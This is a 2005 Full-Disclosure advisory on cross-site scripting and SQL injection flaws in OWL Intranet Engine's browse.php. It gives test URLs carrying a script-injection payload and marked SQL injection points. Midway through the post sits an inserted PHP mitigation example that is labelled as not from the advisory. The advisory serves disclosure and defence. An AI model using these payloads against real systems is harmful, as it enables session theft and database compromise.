[Full-Disclosure] Various Vulnerabilities in OWL Intranet Engine

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 01/01/05

    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vuln@secunia.com
    Date: Sat, 01 Jan 2005 19:52:48 +0000
    
    
    
    

    ----------------------------------------------------------------------------
                   Various Vulnerabilities in OWL Intranet Engine
    ----------------------------------------------------------------------------

    Author: Jose Antonio Coret (Joxean Koret)
    Date: 2004
    Location: Basque Country

    ---------------------------------------------------------------------------

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    OWL 0.7 and 0.8 - Owl is a multi user document repository (knowledgebase)
    system written in PHP4 for publishing files/documents onto the web for a
    corporation, small business, group of people, or just for yourself.

    Web : http://owl.sourceforge.net/

    ---------------------------------------------------------------------------

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~

    A. Cross Site Scripting Vulnerabilities

    A1. In the browser script, various parameters that are used to write the
    HTML code are not verified.

            Test URLS :

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)</script>&order=creatorid&sortposted=DESC

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(document.location)</script>&sortposted=DESC

    B. SQL Injection Vulnerabilities

    B1. In the browser.php script, the following parameters are vulnerable to
    SQL injection attacks.

            Test URLS :
            

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20INJECTION]

    The fix:
    ~~~~~~~~

    All problems are fixed in the CVS.
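
How the parameters named in A1 and B1 can be validated, bound and encoded, as an added example that is not taken from this advisory or from the OWL code base. The table name `documents`, the columns other than `creatorid`, and all function names are assumptions made for illustration.

```php
<?php
// Added illustration, not OWL's code. The table name and every column other
// than the "creatorid" sort key seen in the test URLs are assumptions.
const ORDER_COLUMNS   = ['creatorid', 'name', 'modified'];
const SORT_DIRECTIONS = ['ASC', 'DESC'];

// Accept only integers and allowlisted strings; arrays and junk yield null.
function clean_browse_params(array $get): ?array
{
    $min    = ['options' => ['min_range' => 0]];
    $parent = filter_var($get['parent'] ?? null, FILTER_VALIDATE_INT, $min);
    $expand = filter_var($get['expand'] ?? null, FILTER_VALIDATE_INT, $min);
    $order  = $get['order'] ?? 'name';
    $sort   = $get['sortposted'] ?? 'ASC';
    $ok = $parent !== false && $expand !== false
        && in_array($order, ORDER_COLUMNS, true) && in_array($sort, SORT_DIRECTIONS, true);
    return $ok ? ['parent' => $parent, 'expand' => $expand, 'order' => $order, 'sortposted' => $sort] : null;
}

// Values are bound; identifiers cannot be bound, so only allowlisted ones are
// interpolated. Pass the result to PDO::prepare() and PDOStatement::execute().
function browse_query(array $p): array
{
    $sql = "SELECT id, name FROM documents WHERE parent = :parent ORDER BY {$p['order']} {$p['sortposted']}";
    return [$sql, [':parent' => $p['parent']]];
}

// Encode for the HTML attribute context when parameters are echoed into links.
function sort_link(string $sess, array $p): string
{
    $url = 'browse.php?' . http_build_query(['sess' => $sess] + $p);
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">sort</a>';
}

// Constructed requests shaped like the advisory's test URLs.
$good = ['parent' => '115', 'expand' => '1', 'order' => 'creatorid', 'sortposted' => 'DESC'];
$requests = [
    $good,
    ['expand' => "1'><script>alert(document.location)</script>"] + $good,
    ['parent' => '104[SQL INJECTION]'] + $good,
    ['sortposted' => 'DESC[SQL INJECTION]'] + $good,
];
foreach ($requests as $get) {
    $p = clean_browse_params($get);
    if ($p === null) { echo 'rejected: ', json_encode($get), "\n"; continue; }
    [$sql, $bind] = browse_query($p);
    echo "accepted: $sql ", json_encode($bind), "\n  ", sort_link('SESSION-ID', $p), "\n";
}
```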

    Disclaimer:
    ~~~~~~~~~~~

    The information in this advisory and any of its demonstrations is provided
    "as is" without any warranty of any kind.

    I am not liable for any direct or indirect damages caused as a result of
    using the information or demonstrations provided in any part of this
    advisory.

    ---------------------------------------------------------------------------

    Contact:
    ~~~~~~~~

            Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

    
    

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter:
    http://lists.netsys.com/full-disclosure-charter.html


